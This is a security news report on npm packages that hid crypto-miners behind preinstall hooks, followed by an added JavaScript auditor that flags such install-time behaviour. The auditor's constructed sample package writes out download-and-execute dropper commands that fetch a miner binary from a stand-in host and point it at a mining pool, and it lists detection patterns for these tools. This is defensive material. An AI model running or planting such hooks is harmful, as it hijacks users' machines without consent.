Three JavaScript libraries published to the official NPM package registry have been confirmed to be crypto-mining malware. The discovery, made this week, again highlights how easily open-source package repositories can be abused to deliver attacks against Windows, macOS, and Linux systems.
The packages, all published by the same developer, were presented as JavaScript user-agent string parsers, utilities that pull browser, operating-system, and device details out of the User-Agent HTTP header. Instead, they carried cryptocurrency mining malware.
The bad actor’s NPM account was deactivated, and the three libraries – okhsa, klow, and klown – were removed from the repository on October 15, 2021. The libraries were downloaded 112, 4, and 65 times respectively. “Klow” and “klown” have been tracked under Sonatype-2021-1472, and “okhsa” has been cataloged as Sonatype-2021-1473.
The attack chain hinges on an npm preinstall hook that launches a .bat script on Windows or a .sh script on Unix-like systems:
“Packages ‘klow’ and ‘klown’ contain a cryptocurrency miner. These packages detect the current operating system at the preinstall stage, and proceed to run a .bat or .sh script depending on if the user is running Windows or a Unix-based operating system.”
“These scripts then download an externally-hosted EXE or a Linux ELF, and execute the binary with arguments specifying the mining pool to use, the wallet to mine cryptocurrency for, and the number of CPU threads to utilize,” Sonatype security researcher Ali ElShakankiry said.
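The behaviour Sonatype describes can be caught before a package's install hooks ever run. The following is an added example, not code from Sonatype or from the malicious packages: it statically audits a package's lifecycle scripts for the pattern above (a preinstall hook that branches on the host OS, launches a .bat or .sh dropper, fetches a binary and runs it with miner-style arguments). The package name, file names, URLs and the heuristic patterns are all constructed for illustration; the sample package is not one of the real ones.

```javascript
// Added example (not Sonatype's code nor the malicious packages' code):
// statically audit an npm package for install-time hooks that drop and run
// an external binary. All names, URLs and patterns below are assumptions.

// Scripts npm runs automatically during `npm install` / `npm publish`.
const LIFECYCLE_HOOKS = new Set([
  'preinstall', 'install', 'postinstall',
  'preuninstall', 'uninstall', 'postuninstall',
  'prepare', 'prepublish', 'prepublishOnly', 'prepack', 'postpack',
]);

// Heuristics tuned to the behaviour described in the article; not exhaustive.
const SUSPICIOUS_PATTERNS = [
  { id: 'os-branch',       why: 'branches on the host operating system',
    re: /process\.platform|os\.platform\(\)|['"]win32['"]/ },
  { id: 'spawn',           why: 'spawns a child process',
    re: /child_process|\b(exec|execSync|spawn|spawnSync)\s*\(/ },
  { id: 'dropper-script',  why: 'references a platform shell script',
    re: /[\w./-]+\.(bat|cmd|sh|ps1)\b/i },
  { id: 'downloader',      why: 'downloads an external binary',
    re: /\b(curl|wget|Invoke-WebRequest)\b|https?:\/\/[^\s'"]+\.(exe|elf|bin)\b/i },
  { id: 'make-executable', why: 'marks a file executable',
    re: /chmod\s+(\+x|[0-7]*7[0-7]*)\b/ },
  { id: 'miner-args',      why: 'uses miner-style arguments (pool, wallet, threads)',
    re: /stratum\+tcp|--(pool|wallet|threads|donate-level)\b|xmrig/i },
];

// Tokens that look like paths to scripts shipped inside the package.
const SCRIPT_REF = /[\w./-]+\.(js|cjs|mjs|sh|bat|cmd|ps1)\b/g;

// packageJson: parsed package.json; files: map of path -> file contents.
// Returns the lifecycle hooks found, every heuristic hit, and a verdict.
function auditPackage({ packageJson, files = {} }) {
  const scripts = (packageJson && packageJson.scripts) || {};
  const hooks = Object.entries(scripts)
    .filter(([name]) => LIFECYCLE_HOOKS.has(name))
    .map(([hook, command]) => ({ hook, command }));

  const findings = [];
  const seen = new Set();     // dedupe (source, pattern) pairs
  const visited = new Set();  // files already scanned
  // Work queue of [label, text]: hook commands first, then every package
  // file they reference, transitively (setup.js -> run.sh / run.bat).
  const queue = hooks.map(({ hook, command }) => [`scripts.${hook}`, command]);

  while (queue.length) {
    const [source, text] = queue.shift();
    for (const { id, why, re } of SUSPICIOUS_PATTERNS) {
      const m = re.exec(text);
      if (m && !seen.has(`${source}:${id}`)) {
        seen.add(`${source}:${id}`);
        findings.push({ source, id, why, match: m[0] });
      }
    }
    for (const [ref] of text.matchAll(SCRIPT_REF)) {
      const path = ref.replace(/^\.\//, '');
      if (Object.prototype.hasOwnProperty.call(files, path) && !visited.has(path)) {
        visited.add(path);
        queue.push([path, files[path]]);
      }
    }
  }

  const ids = new Set(findings.map((f) => f.id));
  let verdict = 'ok';
  if (hooks.length && (ids.has('downloader') || ids.has('miner-args') ||
      (ids.has('dropper-script') && ids.has('spawn')))) {
    verdict = 'block';
  } else if (hooks.length && ids.size) {
    verdict = 'review';
  }
  return { hooks, findings, verdict };
}

// Constructed sample mimicking the described behaviour (not a real package).
const SAMPLE_MALICIOUS = {
  packageJson: { name: 'ua-parser-sample', version: '1.0.0',
                 scripts: { preinstall: 'node scripts/setup.js' } },
  files: {
    'scripts/setup.js': [
      "const { execSync } = require('child_process');",
      "const script = process.platform === 'win32' ? 'scripts/run.bat' : 'scripts/run.sh';",
      "execSync(script, { stdio: 'ignore' });",
    ].join('\n'),
    'scripts/run.sh': 'curl -s http://example.invalid/miner.elf -o /tmp/m && chmod +x /tmp/m && ' +
      '/tmp/m -o stratum+tcp://pool.example.invalid:3333 -u WALLET --threads 4',
    'scripts/run.bat': 'powershell -c "Invoke-WebRequest http://example.invalid/miner.exe -OutFile m.exe" && ' +
      'm.exe -o stratum+tcp://pool.example.invalid:3333 -u WALLET --threads 4',
  },
};

// Constructed benign sample: a test script is not a lifecycle hook.
const SAMPLE_BENIGN = {
  packageJson: { name: 'ua-parser-benign', version: '1.0.0', scripts: { test: 'node test.js' } },
  files: { 'test.js': "console.log('ok');" },
};

console.log(JSON.stringify(auditPackage(SAMPLE_MALICIOUS), null, 2));
console.log(auditPackage(SAMPLE_BENIGN).verdict);
```

The audit is a triage aid, not a substitute for reading the package. The cheapest hard control is to stop npm from running lifecycle hooks at all (`npm install --ignore-scripts`, or `npm config set ignore-scripts true` in CI) and to fetch the tarball with `npm pack` and inspect it before allowing any hook to execute.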
This is not the first time malicious packages have turned up in the registry: brandjacking, typosquatting, and crypto-mining malware have all been spotted on NPM before.
In June, researchers from Sonatype and JFrog found packages on the PyPI repository that silently deployed crypto-miners on affected machines. Those packages borrowed the names of repositories or components from high-profile tech companies, the lure used in what are known as dependency confusion attacks.